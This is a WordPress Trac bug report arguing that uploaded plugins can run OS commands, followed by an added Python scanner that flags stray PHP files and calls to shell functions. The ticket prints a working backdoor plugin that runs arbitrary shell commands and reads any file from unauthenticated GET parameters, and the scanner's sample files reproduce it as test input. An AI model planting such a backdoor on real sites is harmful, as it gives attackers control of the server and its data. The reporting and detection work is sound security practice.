[wp-trac] [WordPress Trac] #44826: system calls through php are not prevented
WordPress Trac
noreply at wordpress.org
Tue Aug 21 11:33:28 UTC 2018
#44826: system calls through php are not prevented
----------------------------+-----------------------------
Reporter: danielsvartman | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version: 4.9.8
Severity: major | Keywords:
Focuses: |
----------------------------+-----------------------------
Hi, I know this may be a repetitive thing for you, but it seems that you
don't check within plugins whether the shell_exec, exec, system, popen or
passthru functions are used. Attackers usually leverage them to gain
access to the OS, which is mostly sealed and unreachable from developers.
Do you mind telling me where you stand on it? I found three
different paths to exploit this:
1) Through the wp-content/upgrade folder, after uploading a non-working
plugin on purpose
2) By uploading a regular php file instead of a zip as a plugin. This will
leave the file under the /wp-content/uploads folder without deleting it
3) As a valid plugin (of course).
The plugin I wrote below allows me to run multiple kinds of commands at the
OS level, to retrieve multiple kinds of data:
{{{#!php
<?php
/*
Plugin Name: My Crazy Backdoor Plugin!
*/
// Deliberately vulnerable: unauthenticated, unvalidated $_GET input drives
// OS commands and file reads as the web server user.
$action = isset($_GET['action']) ? $_GET['action'] : '';
$value  = isset($_GET['value'])  ? $_GET['value']  : '';

switch ($action) {
    case "CMD":
        // Runs an arbitrary shell command and streams its output back.
        system($value);
        break;
    case "FILE_READ":
        // Reads any file the web server user can open; file() returns
        // false on failure, so guard the loop.
        $lines = file($value);
        if ($lines !== false) {
            foreach ($lines as $line_num => $line) {
                echo "Line #<b>{$line_num}</b> : " .
                    htmlspecialchars($line) . "<br />\n";
            }
        }
        break;
    case "INFO":
        // phpinfo() prints directly; echoing its return value only adds "1".
        phpinfo();
        break;
}
}}}
I did report this to HackerOne as well, but they just disregarded my
finding and closed the bug, alleging that's how WordPress works. I think
they didn't even pay enough attention to the bug (sites like 000webhost,
x10hosting, WordPress itself, among others, allowed me to upload custom
plugins that will interact with the OS, even if I'm not authorized to do
it).
--
Ticket URL: <https://core.trac.wordpress.org/ticket/44826>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
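The ticket's point is that nothing in core inspects uploaded plugin code for process-spawning functions, and that stray PHP files can be left under wp-content/upgrade and wp-content/uploads. The following is an added example (not code from the ticket or from WordPress) of the check a host or site operator could run themselves: walk a WordPress tree, flag any PHP file under the two directories that should never contain executable PHP (paths 1 and 2 in the report), and flag calls to the functions the reporter names (shell_exec, exec, system, popen, passthru; proc_open is added here as an assumption since it behaves the same way), marking a call as tainted when a request superglobal appears on the same line (path 3). The sample site it builds in a temporary directory, including the backdoor-style plugin, is constructed test input.

```python
"""Heuristic scanner for the three paths in WordPress Trac #44826.

Added example, not part of the ticket or of WordPress. Regex-based, so it
is a triage aid, not a parser: PHP's token_get_all() would be more exact.
"""
import os
import re
import tempfile

# Functions that hand a string to the OS or spawn a process. proc_open is an
# addition to the reporter's list (assumption: same risk class).
DANGEROUS_FUNCS = ("shell_exec", "exec", "system", "popen", "passthru", "proc_open")

# WordPress writes uploads and update archives here; PHP should never run from them.
NO_PHP_DIRS = ("wp-content/uploads", "wp-content/upgrade")

# A bare call: not preceded by a word char, '$' (variable function) or '>' (method).
CALL_RE = re.compile(r"(?<![\w$>])(" + "|".join(DANGEROUS_FUNCS) + r")\s*\(", re.IGNORECASE)
TAINT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*", re.DOTALL)


def strip_comments(src):
    """Remove /* */ and // comments while preserving line numbering."""
    return COMMENT_RE.sub(lambda m: "\n" * m.group(0).count("\n"), src)


def scan_php_source(src):
    """Return [(line_no, function, tainted)] for dangerous calls in PHP source."""
    findings = []
    for lineno, line in enumerate(strip_comments(src).splitlines(), 1):
        for m in CALL_RE.finditer(line):
            findings.append((lineno, m.group(1).lower(), bool(TAINT_RE.search(line))))
    return findings


def scan_tree(root):
    """Walk a WordPress install; report stray PHP files and dangerous calls."""
    report = {"stray_php": [], "dangerous_calls": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5", ".phar")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if any(rel.startswith(d + "/") for d in NO_PHP_DIRS):
                report["stray_php"].append(rel)  # paths 1 and 2 from the ticket
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, func, tainted in scan_php_source(fh.read()):
                    report["dangerous_calls"].append((rel, lineno, func, tainted))
    return report


# Constructed test input modelled on the ticket's plugin (not the ticket's file).
BACKDOOR = """<?php
/*
Plugin Name: Sample backdoor (constructed test input)
*/
switch ($_GET['action']) {
    case "CMD":
        system($_GET['value']);
        break;
}
"""

# Constructed benign file: exec only in a comment and as a PDO-style method call.
BENIGN = """<?php
// exec() mentioned only in a comment, and a method named exec() on an object
$db->exec("SELECT 1");
echo "nothing to see";
"""


def build_sample_site():
    """Lay out a throwaway WordPress-like tree covering all three paths."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    files = {
        "wp-content/plugins/backdoor/backdoor.php": BACKDOOR,      # path 3
        "wp-content/plugins/benign/benign.php": BENIGN,
        "wp-content/uploads/2018/08/dropped.php": BACKDOOR,        # path 2
        "wp-content/upgrade/broken-plugin/shell.php": BACKDOOR,    # path 1
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def run_demo():
    """Build the sample site and return its scan report."""
    return scan_tree(build_sample_site())


if __name__ == "__main__":
    result = run_demo()
    for rel in sorted(result["stray_php"]):
        print("stray PHP in non-executable dir:", rel)
    for rel, lineno, func, tainted in sorted(result["dangerous_calls"]):
        print(f"{rel}:{lineno}: {func}() {'<- request input' if tainted else ''}")
```

The regex pass ignores `$db->exec(` and calls mentioned only in comments, but it is still a heuristic: a `//` inside a string literal (for example a URL) will be treated as a comment, and a function reached through a variable name or `call_user_func` will not match. The scan is a complement to, not a substitute for, the server-side controls that actually stop these paths: `disable_functions` in php.ini for the same function list, and web server rules that refuse to execute PHP under wp-content/uploads and wp-content/upgrade.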